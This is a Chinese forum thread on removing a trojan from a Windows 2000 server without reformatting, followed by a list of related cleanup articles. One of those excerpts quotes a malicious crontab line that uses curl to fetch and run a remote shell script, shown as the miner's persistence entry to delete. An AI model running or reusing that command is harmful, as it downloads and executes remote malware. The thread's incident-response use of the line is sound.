服务器中木马```请问不格式化怎么清楚 [问题点数:0分]
-
本版专家分:9结帖率 100% -
回复次数10楼主请问啊问题点数:0分
-
本版专家分:5202 -
#1 得分:0查到木马进程,杀之,然后删除木马程序文件。
-
本版专家分:9
-
#2 得分:0怎么知道那个是木马进程```??
-
本版专家分:11
-
#3 得分:0up
-
本版专家分:44
-
#4 得分:0这。。。。。。。。。要怎么说啊
是2000的服务器!?
常见病毒冒充系统进程的名字有 svchost.exe svrhost.exe dllhost.exe
总之看看哪个名字不正常,或都应该是SYSTEM的进程,变成用户的进程就有问题了
-
本版专家分:13
-
#6 得分:0如何知道自己的端口使用是否正常呢?我应该如何做呢?哪些端口在上网后会使用到?哪些是非法的端口(例如木马使用的端口)请高手指教
-
本版专家分:133 -
#7 得分:0在命令行下用netstat -an看看,有没有外部的可疑地址。
-
本版专家分:212
-
#8 得分:0用杀毒软件清除
-
本版专家分:184002
-
-
进士
2004年 总版技术专家分年内排行榜第四
2003年 总版技术专家分年内排行榜第九
-
- 金牌 2004年2月 总版技术专家分月排行榜第一
-
-
铜牌
2004年6月 总版技术专家分月排行榜第三
2004年3月 总版技术专家分月排行榜第三
2004年1月 总版技术专家分月排行榜第三
-
-
红花
2004年12月 Windows专区大版内专家分月排行榜第一
2004年9月 Windows专区大版内专家分月排行榜第一
2004年8月 Windows专区大版内专家分月排行榜第一
2004年7月 Windows专区大版内专家分月排行榜第一
2004年6月 Windows专区大版内专家分月排行榜第一
2004年5月 Windows专区大版内专家分月排行榜第一
2004年4月 Windows专区大版内专家分月排行榜第一
2004年3月 Windows专区大版内专家分月排行榜第一
2004年2月 Windows专区大版内专家分月排行榜第一
2004年9月 硬件使用大版内专家分月排行榜第一
2004年8月 硬件使用大版内专家分月排行榜第一
2004年7月 硬件使用大版内专家分月排行榜第一
2004年6月 硬件使用大版内专家分月排行榜第一
2004年4月 硬件使用大版内专家分月排行榜第一
2004年2月 硬件使用大版内专家分月排行榜第一
2004年1月 硬件使用大版内专家分月排行榜第一
2003年12月 硬件使用大版内专家分月排行榜第一
2003年9月 硬件使用大版内专家分月排行榜第一
2003年8月 硬件使用大版内专家分月排行榜第一
2003年7月 硬件使用大版内专家分月排行榜第一
2003年4月 硬件使用大版内专家分月排行榜第一
-
-
#10 得分:0用木马克星啊
----------------------------------------
宠辱不惊,坐看庭前花开花落;
去留无意,漫随天上云卷云舒;
----------------------------------------
- 其他相关推荐
- Linux服务器如何防止中木马? 【转】
- 文章来源:Linux服务器如何防止中木马? (一)解答战略 去企业面试时是有多位竞争者的,因此要注意答题的维度和高度,一定要直接秒杀竞争者,搞定高薪offer。 (二)解答战术 因为Linux下的木马常常是恶意者通过Web的上传目录的方式来上传木马到Linux服务器的,可根据从恶意者访问网站开始-->Linux系统-->HTTP服务-->中间件服务-
- php 网站服务器查找木马的方法
- 由于每个网站使用的语言都不一样,无法做一个统一说明,只能举几个例子。假如你的网站使用php语言,植入的木马基本也都是php语言写的命令。 可以分别试试这两个命令,因为php木马常用eval和create_function来做坏事(说/var/www/路径不存在的同学,面壁思过10分钟)。 grep "eval(" /var/www/* -r grep "create_function(" /var/www/* -r
- 记一次Linux服务器上查杀木马经历
- 转载自:http://www.cnblogs.com/kerrycode/p/4754820.html 开篇前言 Linux服务器一直给我们的印象是安全、稳定、可靠,性能卓越。由于一来Linux本身的安全机制,Linux上的病毒、木马较少,二则由于宣称Linux是最安全的操作系统,导致很多人对Linux的安全性有个误解:以为它永远不会感染病毒、木马;以为它没有安全漏洞。所以很
- 服务器被挂马的一般解决方法
- 服务器被挂马的原因很多,在解决之前,首先要弄清楚被挂马的类型,比较常见的分为ARP挂马和非ARP挂马。先说说ARP挂马吧,机房中了ARP的木马,刚接触到的朋友会觉得很神奇,在服务器上看网站程序都没有被注入的信息,在外网访问却提示有病毒。这就是ARP挂马的现象: (IE访问时,站点被挂马了,但是到服务器上查看实际的文件时,发现服务器上的文件并没有被修改.)一般这种情况我们是没法解决的,只能通过联系机
- linux 木马清理过程
- http://mp.weixin.qq.com/s?__biz=MzA4Nzc4MjI4MQ==&mid=401028869&idx=1&sn=fb40e2d0f353c8cf3353cc3a6352957b&scene=5&srcid=12064TTIfnETNDOM69pF8lR3#rd 服务器出现异常,完全无法访问,ssh登陆都极其缓慢 解决过程 top 查看
- 腾讯云提示有木马文件事件通知 该如何处理?
- 客户的网站于近日收到了来自腾讯云的安全告警,木马文件事件通知!第一时间客户联系到我们SINE安全,把腾讯云提示的问题反馈给了我们安全技术部门,说是网站突然收到了腾讯云的邮件提醒,说什么网站有木马,服务器也存后门文件。客户以前从没有对网站,以及服务器进行安全部署与加固,导致今天发生这样的严重黑客入侵事件。随即我们与客户进行网站服务器的对接工作,服务器的IP,以及SSH端口,root账号密码,包括网站...
- linux服务器被入侵查询木马(清除方法)
- 记录一次查询清除木马过程 木马名称: Linux.BackDoor.Gates.5 前两天服务器被扫描后,出现莫名进程,清理后重启,也把原来的SSH密码登陆改为公钥,仅仅过去两天,一早登陆服务器发现一个进程直接懵了,清掉我ROOT所有文件。 这是/etc/profile文件,发现!!! 这明显是前天我没有清理干净,又被攻击了。那就开始排查,战斗!先清理可疑程序,如: 明显不认识
- 关于服务被挖矿程序minerd入侵解决方法
- 今天一早过来,运维同事发现服务器的负载有点异常,打开top一看,发现有个进程一直占用很高的cpu 在opt目录下发现有个异常文件,是个命令文件minerd 在确定跟项目不相关的情况下判断是个木马程序,果断kill掉进程,然后删除/opt下minerd文件 本想这样可以解决,谁想不到15秒时间,又自动启动起来,而且文件又自动创建,这个让我想起了crontab的定时器,果然运维同
- linux中,如何清除环境中已经分区的磁盘,并格式化数据,不重启系统
- 当前linux系统重装后,一般除了系统盘/dev/sda会重新格式化外, 其余的硬盘的分区信息还是会存在的,此时,如果我们想使用该硬盘,要么使用fdisk /dev/sdb 删除对应的系统分区,但是这种情况下, 需要重启系统相关的分区信息才会消失。 (用fdisk 删除分区可以查看 http://www.linuxidc.com/Linux/2012-...
- Linux清除木马minerd
- minerd是什么今天突然发现cup使用率一直都很高,高达100%,查看后发现多了minerd这个进程,将其kill掉后,过一会还是存在 步骤: 1.删除定时任务的内容 crontab -e 将“/10 * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh”删除 2.删除minerd文件[root@iZ28rvl9qn3Z ~]